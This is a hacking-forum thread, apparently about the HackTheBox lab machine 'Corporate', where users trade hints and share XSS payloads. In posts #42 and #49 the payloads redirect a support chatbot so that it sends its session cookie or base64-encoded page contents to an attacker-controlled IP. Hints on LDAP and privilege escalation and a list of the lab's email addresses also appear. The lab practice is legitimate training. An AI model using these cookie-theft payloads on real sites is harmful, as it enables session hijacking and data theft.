Corporate - HTB
by chillywilly - Saturday December 16, 2023 at 06:06 PM
#41
Thank you. That is silly and aggravates me lol. I have never even HEARD of cookies needing a hardcoded domain. I though injecting into cookie-editor extension would have worked X.x 

(12-19-2023, 11:19 PM)cutearmadillo Wrote:
(12-19-2023, 11:13 PM)yorukama Wrote: You da real MVP.

I have the SSO cookie but cannot get into the people dashboard to save my life. Just get a redirect loop back to the login button.

Set the domain on the cookie correctly Wink
Reply
#42
(12-20-2023, 04:18 AM)magway Wrote:
(12-19-2023, 02:58 PM)mobilehack Wrote:
(12-19-2023, 01:52 PM)geoblitz Wrote:
(12-19-2023, 01:43 PM)mobilehack Wrote: Can anyone share a hint for the root privesc?

how did you eventually get the user pls?

There is a sample request in the forum you can use to steal a cookie that you can use to logon...

but how ? the bot is a HeadlessChrome and it doesn't have any cookies. All i can get is a 'document.domain' and i can't figure out this probably a JSON payload for analytics endpoint.

I've been trying to steal the cookie by following this advise and nothing. I can fetch my host with this bot and NO cookies.

What i've been trying to do for the reference:

ggg<a href="fetch('http%3a//people.corporate.htb/dashboard').then(r+%3d>+r.text()).then(data+%3d>+fetch('http%3a//10.10.14.XXX/'%2bbtoa(data)))" id="send-message">

bot seems to be following the link but not response ! prob because of strict CORS

in the meta I also tried
<meta http-equiv="refresh" content="0; url=http://corporate.htb.............. ;eval(fetch('http%3a//people.corporate.htb').then(r+%3d>+r.text()).then(data+%3d>+fetch('http%3a//10.10.14.XXX/'%2bbtoa(data))));//%27%3C/script%3E"/> <meta http-equiv="refresh" content="0; url=http://corporate.htb/%3Cscript+src='/vendor/analytics.min.js'%3E%3C/script%3E%3Cscript+src='/assets/js/analytics.min.js?v=111));eval(atob('ZmV0Y2goImh0dHA6Ly8xMC4xMC4xNC5YWFgvIikg'));//%27%3C/script%3E"/>

Same. NO response.

Try this:

<meta http-equiv="refresh" content="0; url=http://corporate.htb/%3Cscript+src='/vendor/analytics.min.js'%3E%3C/script%3E%3Cscript+src='/assets/js/analytics.min.js?v=111));document.location=String.fromCharCode(104,116,116,...);//%27%3C/script%3E"/>
Reply
#43
rooted.
this machine sucked.
Reply
#44
(12-20-2023, 12:40 AM)Invinciblee Wrote: I'm on process writing the writeup. Will be posted on my site.

https://darkwing.moe/

Where should we find the passwords for your writeups?
Reply
#45
(12-20-2023, 07:04 AM)chillywilly Wrote: rooted.
this machine sucked.

where is the file that talks about password policy? can you give me a hint ?
Reply
#46
(12-20-2023, 12:40 AM)Invinciblee Wrote: I'm on process writing the writeup. Will be posted on my site.

https://<REDACTED>.moe/

Why you post this link like you are the owner of this blog but it's a lie?

Will be reported to Admin as scam.
Reply
#47
(12-20-2023, 03:57 PM)magway Wrote:
(12-20-2023, 03:17 PM)manamana Wrote: what is the next step after I am getting on people.corporate.htb ?

I Found OVPN config, it connect successful.

I think it's either LDAP enum or file sharing between employees. Trying to enum file shares and shares between employees with POST,  but nothing yet.

Same, any hint on how to proceed?
Reply
#48
either esc elwins privs to sudo group with ldap or look at contents in .mozilla dir
Reply
#49
(12-21-2023, 10:35 AM)hotsweatyandready Wrote:
(12-21-2023, 08:47 AM)fatgirl Wrote: i will trade you a large pizza for the user flag and a dozen donuts for root.

if i throw my stomach over my back and take a sexy picture will you help me with the xss?

<a href="http://corporate.htb/<script+src='/vendor/analytics.min.js'></script><script+src='/assets/js/analytics.min.js?v=document.location=`http://YOUR_IP_GOES_HERE:80/${document.cookie}`'</script>" id="send-message">

This is my payload as a message sent to the support chat bot. It will redirect the bot to another page that is vulnerable to xss and from there will leak the cookie to your http web server. Of course replace the YOUR_IP_GOES_HERE with your own provided IP. After this you will have to continue to people subdomain and add the stolen cookie into the browser.

This payload worked excellently for me. Thank you! for those having issues, make sure you label the cookie CorporateSSO

I'm into people and have the VPN running. I can't find anything in LDAP or NFS so far. I see the file upload and share feature, is it time to go phishing?

All the files up to 243 are giving 403s, except the 5 that my user has access to. I've tried giving myself access through the post request to /sharing, but to no avail.

I've noticed that the JWTs from the chatbot are from different users.

The reset-password just says that the password needs to be 8 characters long, regardless of how long I make it. It might actually require the old password.

Mostly, I just need a nudge in the right direction. Phishing, LDAP, NFS, etc. Though I've just about run out of ideas for LDAP and NFS.
Reply
#50
(12-22-2023, 12:05 AM)fatgirl Wrote: i found these users but they're vegan so i dont want them and u can have them
jammie.corkery@corporate.htb ward.pfannerstill@corporate.htb oleta.gutmann@corporate.htb kian.rodriguez@corporate.htb jacey.bernhard@corporate.htb veda.kemmer@corporate.htb raphael.adams@corporate.htb stevie.rosenbaum@corporate.htb halle.keeling@corporate.htb ross.leffler@corporate.htb marcella.kihn@corporate.htb joy.gorczany@corporate.htb larissa.wilkinson@corporate.htb skye.will@corporate.htb gideon.daugherty@corporate.htb amie.torphy@corporate.htb katelyn.swift@corporate.htb lila.mcglynn@corporate.htb estelle.padberg@corporate.htb kacey.krajcik@corporate.htb tanner.kuvalis@corporate.htb elwin.jones@corporate.htb anastasia.nader@corporate.htb morris.lowe@corporate.htb leanne.runolfsdottir@corporate.htb gayle.graham@corporate.htb dylan.schumm@corporate.htb richie.cormier@corporate.htb marge.frami@corporate.htb erna.lindgren@corporate.htb callie.goldner@corporate.htb uriel.hahn@corporate.htb ally.effertz@corporate.htb annamarie.flatley@corporate.htb candido.mcdermott@corporate.htb scarlett.herzog@corporate.htb estrella.wisoky@corporate.htb adrianna.stehr@corporate.htb abbigail.halvorson@corporate.htb august.gottlieb@corporate.htb harley.ratke@corporate.htb laurie.casper@corporate.htb arch.ryan@corporate.htb dayne.ruecker@corporate.htb abigayle.kessler@corporate.htb katelin.keeling@corporate.htb penelope.mcclure@corporate.htb rachelle.langworth@corporate.htb america.kirlin@corporate.htb garland.denesik@corporate.htb cathryn.weissnat@corporate.htb elwin.mills@corporate.htb beth.feest@corporate.htb mohammed.feeney@corporate.htb bethel.hessel@corporate.htb nya.little@corporate.htb kasey.walsh@corporate.htb stephen.schamberger@corporate.htb dessie.wolf@corporate.htb mabel.koepp@corporate.htb christian.spencer@corporate.htb esperanza.kihn@corporate.htb justyn.beahan@corporate.htb josephine.hermann@corporate.htb sadie.greenfelder@corporate.htb zaria.kozey@corporate.htb antwan.bernhard@corporate.htb hector.king@corporate.htb brody.wiza@corporate.htb jammie.corkery@corporate.htb hermina.leuschke@corporate.htb julio.daniel@corporate.htb candido.hackett@corporate.htb dangelo.koch@corporate.htb nora.brekke@corporate.htb margarette.baumbach@corporate.htb michale.jakubowski@corporate.htb cecelia.west@corporate.htb rosalee.schmitt@corporate.htb
List need a little rework to make it useful .... but if someone here had done the box whiteout copy-paste(which i doubt  ) ... there no need of a list ... one bot will expose itself Big Grin 

anyway make  a lil bash script do not hurt ..

uh seems you and other are going wild whit writeups popping out .... hope at least the copy-paste bois are learning something cuz this box as loooot to teach
Ban reason: Leeching | https://raidforums.su/Forum-Ban-Appeals if you feel this is incorrect. (Permanent)
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 90,871 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 4,338 03-28-2026, 03:30 AM
Last Post: lulaladrow
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 9,501 03-27-2026, 07:22 PM
Last Post: stn
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 2,324 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 2,622 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: 1 Guest(s)